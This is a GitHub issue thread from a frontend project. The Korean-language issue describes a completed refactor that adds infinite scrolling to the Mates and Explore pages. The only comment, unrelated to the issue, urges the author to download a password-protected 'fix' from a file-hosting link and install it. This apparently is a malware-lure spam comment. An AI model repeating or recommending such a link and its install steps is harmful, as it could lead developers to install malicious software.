### ISSUE TITLE
[Refactor] Mates, Explore 무한스크롤 적용

### ISSUE THREAD

**Issue by gahyeon11** [MeloDiary/melodiary-FE#88]
## 설명

- 무한 스크롤 가능하도록 param을 포함시킵니다. 

## 할 일

- [x] api 호출 함수 수정
- [x] 커스텀 훅 수정
- [x] 메인 컴포넌트 수정

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
